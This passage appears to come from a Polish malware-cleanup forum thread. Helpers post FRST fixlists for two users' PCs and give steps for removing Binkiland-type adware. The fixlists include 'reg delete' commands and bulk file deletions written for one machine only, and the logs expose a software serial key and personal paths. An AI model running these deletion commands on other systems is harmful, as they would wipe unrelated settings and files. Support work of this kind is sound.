System32\Tasks\{6A0EE277-B121-43EA-8925-CA087E2945B4} => pcalua.exe -a "C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\spolszczenie GTA 4 0.97b.exe" -d "C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV" Task: {30B62D51-C4B5-4CFD-9FCB-5F5B092AD01D} - System32\Tasks\{383F8D4C-6311-46D9-A503-FD199FF77807} => pcalua.exe -a C:\Users\Marek\Downloads\nor4full\nor4full\Setup.exe -d C:\Users\Marek\Downloads\nor4full\nor4full Task: {37C428CC-CA5E-4072-9813-E0D0B23AE4B2} - System32\Tasks\{CAE3FC35-FC83-4925-912A-2AD2184496EB} => pcalua.exe -a "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64\archive.exe" -d "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64" Task: {39D8AD39-648D-46E1-9847-A1E1236B4CE1} - System32\Tasks\{0885A0E0-9032-48DD-81D7-269709935185} => pcalua.exe -a "C:\Program Files (x86)\Samsung\Kies\KiesDriverInstaller.exe" -d "C:\Program Files (x86)\Samsung\Kies" Task: {3C97B31E-8B19-47D9-9667-7FD2AD4943A8} - System32\Tasks\{F678BBD6-D866-4504-8B20-6D7C6119EA68} => pcalua.exe -a "C:\Users\Marek\Documents\Archicad 15 pl\ArchiCAD 15\ArchiCAD 15-Win64\Setup.exe" -d "C:\Users\Marek\Documents\Archicad 15 pl\ArchiCAD 15\ArchiCAD 15-Win64" Task: {49C1EE6F-0F20-4775-A860-2C8026BEBC5B} - \hdtotal1.3-chromeinstaller No Task File Task: {4CF90ABA-19FB-413A-8C5E-5FC47F0BBC5E} - System32\Tasks\{C93A41AD-E21C-4768-B432-632ECAA6846D} => pcalua.exe -a C:\Users\Marek\Downloads\Second_Life_Setup.exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {50CC78FF-6186-4524-AE7F-1A9DB5AEEC14} - System32\Tasks\{CAB4599B-DBE6-4E9F-B6F0-34442F762910} => pcalua.exe -a "C:\Program Files (x86)\Samsung\Kies\KiesDriverInstaller.exe" -d "C:\Program Files (x86)\Samsung\Kies" Task: {52BE1C64-C26E-4EDD-8A88-192DDF37D836} - System32\Tasks\{6AA1B680-C346-4410-AD1F-11DDE7B0B54F} => C:\Program Files (x86)\Concilio\ProjectFuture\projectfuture.exe Task: {68D8FBC5-8C7E-4CDD-8041-B7729B18CB87} - System32\Tasks\{D3FCEDEB-8DB0-4D98-B3C8-3CB9D39BA019} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{974C4B12-4D02-4879-85E0-61C95CC63E9E}\setup.exe" -c -runfromtemp -l0x0015 -removeonly Task: {6A7EE5EA-8184-4B70-8B05-44CFF1AA9626} - System32\Tasks\{1EE6F774-B12D-40EF-B995-754B3D224B7F} => pcalua.exe -a C:\Users\Marek\Downloads\Flash_Disinfector.exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {6E4DE8AC-987B-4017-9CAC-43C5B59E99D5} - System32\Tasks\{CE222A91-2952-46BC-A751-725498793F43} => pcalua.exe -a C:\instalatory\programy\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\install\setup.exe -d C:\instalatory\programy\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\install Task: {795CA726-7113-41F0-A020-CF4CD47922CD} - System32\Tasks\Launch HTC Sync Loader => C:\Program Files (x86)\HTC\HTC Sync 3.0\htcUPCTLoader.exe Task: {7B4F158A-F0AE-4052-9511-C5C5D180539E} - System32\Tasks\{5189E901-8899-4B9D-B02F-CF518C04C5C3} => pcalua.exe -a "C:\instalatory\programy\stery do tv\DirectX\dx9install.exe" -d "C:\instalatory\programy\stery do tv\DirectX" Task: {8193B431-08A2-4A89-808C-72922A8D47B9} - System32\Tasks\{95D927FD-4B7B-44C3-9ED6-D7ED9E8C169E} => Firefox.exe http://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain Task: {829C5D4A-1897-4FA0-BE7E-933D7FE33968} - \hdtotal1.3-enabler No Task File Task: {83EFCDAA-CCBF-4A62-86E9-C79BEF057324} - System32\Tasks\{C3ABCCEE-F216-4136-AE4D-9DB02F53ABAE} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="2M0K-K085-4W59-U5LW-585P-W083-MM85-1Z8L-257X-66XA-TC3T-K1M8-3204-2A2C-5T2C-2408-4W3C-6482" Task: {84101856-1EB2-4C0F-9D1C-FA165785B408} - System32\Tasks\{1C79DFE8-4301-4BDE-940C-40257101A229} => pcalua.exe -a "C:\Program Files (x86)\Combined Community Codec Pack\Filters\madVR\InstallFilter.exe" -d "C:\Program Files (x86)\Combined Community Codec Pack\Filters\madVR" Task: {871187CE-ADA5-41F2-9E00-4B727DF9C226} - System32\Tasks\{57573279-914B-4833-8628-F5CCD446E132} => pcalua.exe -a "C:\Program Files (x86)\HDDGURU LLF Tool\unins000.exe" -d "C:\Program Files (x86)\HDDGURU LLF Tool" Task: {8CE9278D-FAB4-4F5E-8D8F-DE014B6227D5} - \hdtotal1.3-codedownloader No Task File Task: {9E23C915-11AD-47F4-9EC5-1C1363838720} - System32\Tasks\{55445773-79E0-4EC3-8CC8-AD3A3A0B0BE9} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{7E19B002-4CA3-4C9F-BA92-91D101B97219}\setup.exe" -c -runfromtemp -l0x0009 -removeonly Task: {A5B4CED1-8847-4194-B001-DCD3F75B6C51} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3251776730-861767313-4254609882-1000 Task: {B05B7162-F070-412A-AF43-BA342DC153A0} - System32\Tasks\{6703D721-F800-4CF7-BC1D-22F39B830235} => pcalua.exe -a "Q:\gry i programy\antymalware\sar_15_sfx.exe" -d "Q:\gry i programy\antymalware" Task: {B466D0BA-E4B2-4534-BF37-D1D396F68473} - \hdtotal1.3-updater No Task File Task: {C373681C-C9C1-4370-BC5F-9A1A6EEF73CE} - System32\Tasks\{A34D8324-5C67-4278-9C18-5CBCCCD9DEDC} => C:\Program Files (x86)\Concilio\ProjectFuture\projectfuture.exe Task: {C8FE7D71-7FA1-4746-B05A-1541F1E0DBA6} - System32\Tasks\{EBC13C0C-79CD-4675-8E05-4CCC9FC40977} => pcalua.exe -a "C:\Program Files (x86)\The SIMS 4 Deluxe Edition\__Installer\vp6\vp6install.exe" -d "C:\Program Files (x86)\The SIMS 4 Deluxe Edition\__Installer\vp6" Task: {CA3E3153-A271-4414-91BB-ECBDC4DAFE69} - System32\Tasks\{5852168C-8337-4D69-90AA-8864BF9D5495} => C:\Program Files (x86)\Dziobas Rar Player\DziobasPlayer.exe Task: {CC549727-BE44-4552-A46A-8A4F3659E141} - System32\Tasks\{44E91F80-513D-432F-A858-BE58D06BB4AF} => C:\Program Files (x86)\iPlus\iPlusManager.exe Task: {CD74A4A6-3202-493A-A828-D5F442A7E883} - System32\Tasks\{D5616665-48F2-461B-A18D-D43DECEFDDFF} => pcalua.exe -a D:\Portable.Adobe.Photoshop.CS4-PL\PhotoshopPortable.exe -d D:\Portable.Adobe.Photoshop.CS4-PL Task: {CE8A146F-3D1A-4F84-BED8-BA7BCACAEE54} - System32\Tasks\{381A7BB8-1770-4944-ACD0-8D1B7E534A1C} => C:\Program Files (x86)\KryptoANSI\KryptoANSI.exe Task: {D39596FD-E820-4EFE-BAE2-005F461306C4} - System32\Tasks\{D8220155-1EC4-4B00-A4EF-64752FFCAFED} => C:\Program Files (x86)\KryptoANSI\KryptoANSI.exe Task: {D667EBB4-E48B-4B66-BB4B-496102BBC695} - System32\Tasks\{6F9F6ACA-2BC2-4169-93D1-7F019752CE16} => pcalua.exe -a "C:\Program Files (x86)\Combined Community Codec Pack\madVR\InstallFilter.exe" -d "C:\Program Files (x86)\Combined Community Codec Pack\madVR" Task: {D8FF207C-78C8-4BBB-BFDD-342028082D87} - System32\Tasks\{78902D5B-13CF-4C59-B0DF-3624594BB45D} => pcalua.exe -a "C:\Program Files (x86)\Audials\Audials 10\AudialsWebInstaller.exe" -d "C:\Program Files (x86)\Audials\Audials 10" Task: {DF528FED-40A0-4A34-89CB-A436FD65DB76} - \PandaUSBVaccine No Task File Task: {E0282C77-C540-4C52-9BA4-03F56A712122} - System32\Tasks\{AAA19B20-6EFF-4158-821D-E2B361A1A2BB} => pcalua.exe -a "C:\Program Files (x86)\Torntv V9.0\Uninstall.exe" -c /fromcontrolpanel=1 Task: {E2D6CF48-73EC-4BA5-BFFA-3033906C2823} - \hdtotal1.3-firefoxinstaller No Task File Task: {E2DF7DB9-8D61-4709-A525-F3D94CE22F29} - System32\Tasks\{B7C0AE89-C6B8-4ADD-BD70-16D27A2821BC} => pcalua.exe -a I:\wyk\Instaluj.exe -d I:\wyk Task: {E3834461-5543-4ADF-8CE8-92888A82D2EB} - System32\Tasks\{234B74DB-ADB2-4535-8CFA-0BCD5742312C} => C:\instalatory\programy\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\IVT.BlueSoleil.v6.4.249.0.Incl.Keymaker\install\setup.exe Task: {E5E98EA4-CC59-42AD-9ED4-E4EAA13E9B01} - System32\Tasks\{541C7703-F1EA-4FC1-8BE2-CCE302FC9AD3} => pcalua.exe -a C:\Users\Marek\Downloads\PhotoScapeSetup_V3.0.exe -d "C:\Program Files (x86)\Mozilla Firefox" Task: {E9007F25-D992-476B-BF50-E27FCFDED0E3} - System32\Tasks\{F7AE00DC-16D0-4D81-855B-3DC19C25CC8E} => pcalua.exe -a "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64\Setup.exe" -d "C:\Users\Marek\tadeusza\kopia kartaMSD\Achicad15_PL\ArchiCAD 15\ArchiCAD 15-Win64" Task: {FAA9AB2A-9D4D-4D36-8E4D-DA25EE666D07} - System32\Tasks\{E89746D9-5A43-4694-BBC0-5726DB179D8D} => pcalua.exe -a C:\Users\Marek\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE\FastTrack_Schedule_10_Install.exe -d C:\Users\Marek\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE\Fasttrack.Schedule.10.0.1.Build.5000-ENGiNE C:\ProgramData\bdinstall.bin C:\ProgramData\svcnet2.cfg C:\ProgramData\svcnet2.inc C:\ProgramData\svcnet2.txt C:\ProgramData\Malwarebytes Anti-Exploit C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRID 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AquaSoft C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Counter-Strike 1.6 v23 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Disney Interactive Studios C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDD Low Level Format Tool C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MegaDev C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mr DJ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nero C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NSS C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Planista 6.3 demo C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Planista 6.5 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Planista BD 2008 edukacyjny C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Szkola podstawowa klasa 4-6 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Szkola podstawowa klasa 5 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoMate C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Tanks C:\ProgramData\Orbit C:\Users\Marek\storage.dat C:\Users\Marek\AppData\Local\BvCVTAfEFLcTfo5q2WAdGHVdWD496UF3Ia1 C:\Users\Marek\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Marek\AppData\Local\setup.txt C:\Users\Marek\AppData\Roaming\bitlord_log.txt C:\Users\Marek\AppData\Roaming\PT C:\Users\Marek\AppData\Roaming\VJ C:\Users\Marek\AppData\Roaming\WUUQGY C:\Users\Marek\AppData\Roaming\ZNJT C:\Users\Marek\AppData\Roaming\Autodesk\AutoCAD 2012 - English C:\Users\Marek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Nero StartSmart Essentials.lnk C:\Users\Marek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Orbit.lnk C:\Users\Marek\AppData\Roaming\Microsoft\Office\Niedawny\*.LNK C:\Users\Marek\AppData\Roaming\Microsoft\Windows\SendTo\Dokumenty na Marek Urządzenie.LNK C:\Users\Marek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\Marek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft C:\Users\Marek\AppData\Roaming\Microsoft\Word\Dok3304048411848414037\Dok3.docx.lnk C:\Users\Marek\AppData\Roaming\Orbit C:\Users\Marek\AppData\Roaming\Origin\update.vbe C:\Users\Marek\Desktop\Emilka\Muzyka Emilki\Sigma - Nobody To Love.mp3 — skrót.lnk C:\Users\Marek\Desktop\Pulpit\Assassin's Creed IV - Black Flag.lnk C:\Users\Marek\Desktop\Pulpit\Borderlands 2.lnk C:\Users\Marek\Desktop\Pulpit\FlashGet3.lnk C:\Users\Marek\Desktop\Pulpit\Grand Theft Auto IV.lnk C:\Users\Marek\Desktop\Renualda Emilson\stare.lnk C:\Users\Marek\Desktop\Renualda Emilson\taniec.lnk C:\Users\Marek\Documents\Inventor Server x64 AutoCAD 2012 Language Pack - English\Default.ipj.lnk C:\Users\Marek\Graphisoft\BIMx dla ArchiCADa 15.lnk C:\Users\Marek\Saved Games\League of Legends\League of Legends.lnk C:\Users\Marek\tadeusza\Documents\Open_Workbench_tutorial.pdf — skrót.lnk C:\Users\Marek\tadeusza\at nie dotykać\w_prot+koszt_firmy\URB\urb_twarda\CDBurnerXP.lnk C:\Windows\system32\3901.tmp C:\Windows\system32\BasementDusterOff.ini C:\Windows\system32\Drivers\2785510A.sys C:\Windows\system32\Drivers\TrueSight.sys C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 C:\Windows\SysWOW64\BasementDuster.ini C:\Windows\SysWOW64\BasementDusterOff.ini Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy omniboxes oraz inne niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition. Dołącz też plik fixlog.txt.

Plik FRST.txt przeniosłam do załączników. Problem hiperlinków miał zostać usunięty już zadanymi działaniami... Obecnie w raportach brak jakichkolwiek oznak czynnego adware (do korekty będą tylko drobnostki), tak więc w której przeglądarce są te podkreślenia?

Prócz wspominanego śmiecia są i inne problemy widoczne. Wykonaj: 1. Przez Panel sterowania odinstaluj: - Adware/PUP: Ace Stream Media 2.1.10.2, AVG Nation toolbar, Dealio Toolbar v10.0, File Type Advisor 1.4, WSE_Binkiland. Tak, Ace Stream Media to instalacja o cechach adware: KLIK. - Stare wersje i zbędniki: Adobe Flash Player 14 ActiveX, Adobe Flash Player 14 Plugin, Adobe Reader X (10.1.10) - Polish, Logitech Desktop Messenger, Macromedia Flash Player 8, Macromedia Flash Player 8 Plugin, MyFreeCodec. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Updater Service for StartNow Toolbar; C:\Program Files (x86)\StartNow Toolbar\ToolbarUpdaterService.exe [265952 2012-06-22] () R1 wStLib64; C:\Windows\System32\drivers\wStLib64.sys [61120 2014-03-22] (StdLib) S1 ArcCtrl; system32\drivers\ArcCtrl.sys [X] U3 BcmSqlStartupSvc; No ImagePath U2 CLKMSVC10_3A60B698; No ImagePath U2 CLKMSVC10_C3B3B687; No ImagePath U2 DriverService; No ImagePath U2 iATAgentService; No ImagePath U2 idealife Update Service; No ImagePath U3 IGRS; No ImagePath U2 IviRegMgr; No ImagePath S3 massfilter; system32\DRIVERS\massfilter.sys [X] S3 NUMARK_OMNICONTROL; System32\Drivers\nkc2_usb.sys [X] S3 NUMARK_OMNICONTROL_MIDI; system32\drivers\nkc2midi.sys [X] S3 NUMARK_OMNICONTROL_WDM; system32\drivers\nkc2_wdm.sys [X] U2 nvUpdatusService; No ImagePath U2 Oasis2Service; No ImagePath U2 PCCarerService; No ImagePath U2 ReadyComm.DirectRouter; No ImagePath U2 RichVideo; No ImagePath U2 RtLedService; No ImagePath U2 SeaPort; No ImagePath U2 SoftwareService; No ImagePath U3 SQLWriter; No ImagePath U2 Stereo Service; No ImagePath S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X] S3 ZTEusbnet; system32\DRIVERS\ZTEusbnet.sys [X] S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X] S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X] Task: {15A18217-198C-4CC9-9C16-4B1F6B0047D9} - System32\Tasks\{D24F617A-77F2-4066-9A35-6EA73973CEA8} => E:\Setup.exe Task: {18952A63-579B-4AAF-AD62-0E541611DD72} - System32\Tasks\{0C6E060E-2ED4-45CF-B20E-DF2486577280} => C:\Users\Marcin\Desktop\POBIERANIE\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7.exe Task: {216F590D-3DC3-4899-862D-7043417EB176} - System32\Tasks\{E8494EE5-254B-4E3C-B0B4-9FAD5661ED22} => pcalua.exe -a "C:\Program Files (x86)\Emergency 3\ModInstaller.exe" -d "C:\Program Files (x86)\Emergency 3" Task: {265359E6-A98D-48AD-A538-1D5D328DC313} - System32\Tasks\{50186A91-80DF-400B-B8D8-65C110FBD04A} => C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe Task: {297CA3A8-0C38-4AB5-AE7A-D21617BF2E2A} - System32\Tasks\{9920BCAE-1505-44A3-BAAA-D93FD1416D3E} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {378B5784-561C-4624-917C-C51A862FBF35} - System32\Tasks\{D23324FB-EADB-438E-896C-EDBF078F2F1A} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {4223CE68-8547-4BAA-892E-941C88C0E305} - System32\Tasks\{29383770-B5CD-4D86-95AC-6A2EA56556A2} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {427E28D4-19A3-4D3E-BA34-9266BECFC380} - System32\Tasks\{F2E71516-7AD8-4CA4-BDDD-9781FE38C903} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {44E12810-B534-4A81-8CE6-A167DF27BDA3} - System32\Tasks\{E76E5447-6E44-44F4-9804-A1807BA2DA6A} => E:\Setup.exe Task: {5139A7B2-CE08-41C3-8A3E-E97F89E9C382} - System32\Tasks\{BAA464EE-75C5-43CD-8356-D19C34967262} => C:\Users\Marcin\Desktop\POBIERANIE\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7.exe Task: {52D8900F-4448-46DA-82D9-F8C46008D62D} - System32\Tasks\{7EEE4116-8EDF-4521-B911-158E4DF3EDF5} => C:\Program Files (x86)\VirtualDJ\virtualdj_pro.exe [2010-10-12] (Atomix Productions) Task: {571E0506-00D4-442F-BBE1-12CD777F6A8F} - System32\Tasks\{B58D1BB3-3505-4986-AF29-B0861F625D54} => C:\Program Files (x86)\Enlight Software\Hotel Giant\hotel.exe Task: {5AD8AB6B-30C7-45D0-8C45-FF439B37CC47} - System32\Tasks\Omiga Plus RunAsStdUser => C:\Program Files (x86)\Omiga Plus\omigaplus.exe Task: {6023F391-BE36-4C47-A679-A56CF07E551C} - \Program aktualizacji online firmy Logitech. No Task File Task: {61FEFDF5-612A-4D55-BE49-42DC50E39CBB} - System32\Tasks\{F266AD1B-7FC4-48FA-B4FA-181866D9433D} => pcalua.exe -a C:\Users\Marcin\Desktop\VSX3_Pro_TBYB.exe -d C:\Users\Marcin\Desktop Task: {61FFAC96-A131-40A2-8DC4-CB4D836275BD} - System32\Tasks\{C937CA49-6C4C-4136-8286-58C026B113A0} => pcalua.exe -a "C:\Users\Marcin\Desktop\Magic Mouse Driver\Apple-MagicMouse-Driver_64bit.exe" -d "C:\Users\Marcin\Desktop\Magic Mouse Driver" Task: {6F97F297-95FF-4E72-B211-F5818D6C84EC} - System32\Tasks\{0125155C-D145-4C1B-9113-1D006DB0807E} => C:\Program Files (x86)\MAGIX\Movie_Edit_Pro_17_Plus_Download_Version\Videodeluxe.exe Task: {74873DF5-CE52-4A30-BA78-FE0F52C50A6F} - System32\Tasks\{FE5F14C9-0DD7-429D-B24F-51DEC5CDC802} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {749555C4-E731-4F47-80BF-6CC26ABE74FA} - System32\Tasks\{D3A18EC7-D968-4402-8F34-606DF733588B} => E:\Setup.exe Task: {76C744E4-5281-4EE3-9DDB-51F22F231858} - System32\Tasks\{68ACCDBC-29B3-4650-B34B-9330376D875F} => pcalua.exe -a C:\PROGRA~2\VIRTUA~1\UNWISE.EXE -c C:\PROGRA~2\VIRTUA~1\INSTALL.LOG Task: {818B49CC-7218-4BAC-80C2-738D6CDC508D} - System32\Tasks\{5F33BCFB-702A-4CB2-8D21-33961E5A2408} => C:\Program Files (x86)\Enlight Software\Hotel Giant\hotel.exe Task: {824A98BC-C56C-456C-A54C-128040BDD38C} - System32\Tasks\{ECF0CE26-5B9C-47A8-B36E-CA040427DFB0} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {8C0AE68A-2216-4181-B839-04CD48744CD2} - System32\Tasks\FileAdvisorCheck => C:\Program Files (x86)\File Type Advisor\file-type-advisor.exe [2013-09-04] (filetypeadvisor.com ) Task: {9C9491DC-D5EE-44F7-938B-1831C106DECC} - System32\Tasks\{02006280-0368-4B7C-BF1F-1C3685153417} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\Faraon\Pharaoh.exe Task: {9D6797C6-F86F-4C7C-8DC6-0F6D009756D5} - System32\Tasks\{9419727D-83C4-4CC9-AB62-9CF788B9A2B8} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {A3F6B407-0E9E-4A83-B498-0CF16232A544} - System32\Tasks\Binkiland redi => C:\ProgramData\{465BAE98-16D9-7F1E-A75F-0F9C77DDDC12}\1.9.3.1\f Task: {B2679A5F-0C7E-4793-B5CF-B94B73AC3EDD} - System32\Tasks\{01344179-7362-4317-8FBA-122079797C1F} => F:\Aplikacje\Pelne\DETEKTYW.exe Task: {B72713A7-D62D-4063-97B1-03EDDB5A888F} - System32\Tasks\{07AB32F2-1F69-4422-A30E-AD925F77EE7E} => F:\Aplikacje\Pelne\DETEKTYW.exe Task: {BAE95791-EC8E-4E14-8D9A-E651756CA014} - System32\Tasks\FileAdvisorUpdate => C:\Program Files (x86)\File Type Advisor\fileadvisor.exe [2013-09-04] (File Type Advisor) Task: {BC976ACE-AA1B-419E-8A75-83A2C0E9412A} - System32\Tasks\{4D832EE1-91BC-48B8-BD20-BD360101F8C5} => C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe Task: {BCB724E4-6E9B-4AB8-A4E7-358226834B90} - System32\Tasks\{7324BEB5-0C70-4D40-B1B1-9FEA064782ED} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {BF88BA6F-0783-4D0D-996E-32A7012146DE} - System32\Tasks\Desk 365 RunAsStdUser => C:\Program Files (x86)\Desk 365\desk365.exe Task: {C0A0FD59-BC6C-4742-9878-885F10B86F9B} - System32\Tasks\{63E10826-C2E8-4912-97D8-EB143EDBC727} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {C36882B5-D8EA-4939-95FB-64B0B56420B0} - System32\Tasks\{84986CB7-7428-48DF-A35C-AE4670F77FFF} => C:\Users\Marcin\Desktop\karafun nuty\KaraFun Studio 1.10a Portable - odtwarzacz i edytor\KaraFun Studio 1.10a (Portable)\KaraFun.exe Task: {C5605991-14C3-4A40-84E1-CCB08425935F} - System32\Tasks\{E09B9669-5E47-415B-8E20-11141295D11A} => E:\Setup.exe Task: {C9987224-08E6-4552-87E0-DA13F486CDE6} - System32\Tasks\{DE39FF16-A3DF-4FC3-81F3-7545C43B9816} => C:\Users\Marcin\Downloads\ChomikBox\Collin McRae 04 RIP\Collin McRae 04 RIP\CollinMcRae04\cmr4.exe Task: {CB17DD0D-9278-4DD4-995C-6018EB7B7EB9} - System32\Tasks\{1508DE4F-B90F-49D5-AFF7-D1BC749CD9AE} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {CE4645E9-D139-4D60-9EF0-BDE451AC021F} - System32\Tasks\{E82259CA-13C5-4C83-9F73-ED2DAB4B5C8D} => pcalua.exe -a "C:\Users\Marcin\Desktop\sety\milk\ulead video studio11pl\ulead video studio11pl\UVS11_Pack_Pol-szablony.exe" -d "C:\Users\Marcin\Desktop\sety\milk\ulead video studio11pl\ulead video studio11pl" Task: {D7D26FF7-FC28-4D44-B96E-56DD58045A9E} - System32\Tasks\{04E1A439-DC22-47E0-B6FB-E56F87154541} => G:\FOLDERY Z PULPITU\na laptopa\install_virtualdj_v5.0.exe Task: {E651230C-A392-4C6D-9E7D-0BD74F70D8CB} - System32\Tasks\{4C41E416-59B2-4712-A032-84C43E8AD9DC} => E:\Setup.exe Task: {EB8B3E74-941A-41AA-BC31-A316CC4978BC} - System32\Tasks\{A05CDBAA-A8BF-4AF1-9529-C141AFAE8D84} => C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe Task: {EE705217-6BBB-465E-9651-66E7047C1149} - System32\Tasks\Wse_binkiland => C:\Users\Marcin\AppData\Roaming\Wse_binkiland\UpdateProc\UpdateTask.exe [2015-03-11] () Task: {EFBE5A1D-C108-4977-894C-A7509FD61104} - System32\Tasks\{84A32FF4-6188-4421-B0AD-5582A67C0ECC} => pcalua.exe -a "F:\USB Driver for Windows OS\setup.exe" -d "F:\USB Driver for Windows OS" Task: {FA6810CF-BC29-490E-BB72-2AD7867ACF19} - System32\Tasks\{668BD109-6D84-49ED-ABEB-0882432C247F} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: C:\windows\Tasks\Wse_binkiland.job => C:\Users\Marcin\AppData\Roaming\WSE_BI~1\UPDATE~1\UPDATE~1.EXE AppInit_DLLs-x32: C:/PROGRA~3/{465BA~1/193~1.1/redi.dll => C:\ProgramData\{465BAE98-16D9-7F1E-A75F-0F9C77DDDC12}\1.9.3.1\redi.dll [1010688 2015-03-11] () HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [searchSettings] => "C:\Program Files (x86)\Common Files\Spigot\Search Settings\SearchSettings.exe" HKLM\...\Policies\Explorer: [NoControlPanel] 0 CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HomePage: Default -> hxxp://binkiland.com/?f=1&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= CHR StartupUrls: Default -> 